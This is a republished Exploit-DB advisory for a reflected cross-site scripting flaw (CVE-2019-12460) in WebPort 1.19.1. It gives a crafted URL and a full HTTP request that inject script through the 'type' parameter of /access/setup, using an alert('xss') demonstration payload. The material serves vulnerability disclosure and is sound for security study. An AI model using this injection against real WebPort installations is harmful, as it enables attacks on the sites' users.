WebPort 1.19.1 – ‘setup’ Reflected Cross-Site Scripting

• Exploit Database
• 13 阅读

• 作者： Emre ÖVÜNÇ
  日期： 2020-06-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48612/

• # Exploit Title: WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
  # Date: 2019-05-30
  # Exploit Author: Emre ÖVÜNÇ
  # Vendor Homepage: https://webport.se/
  # Software Link: https://webport.se/nedladdningar/
  # Version: v1.19.1
  # Tested on: Windows/Linux
  
  # CVE-2019-12460
  # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12460
  # https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
  
  # PoC
  To exploit vulnerability, someone could use 'http://
  [server]:8090/access/setup?type="</script><script>alert('xss');</script><script>'
  request
  to impact users who open a maliciously crafted link or third-party web page.
  
  GET /access/setup?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E
  HTTP/1.1
  Host: [TARGET]
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
  Gecko/20100101 Firefox/67.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: close
  Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37
  Upgrade-Insecure-Requests: 1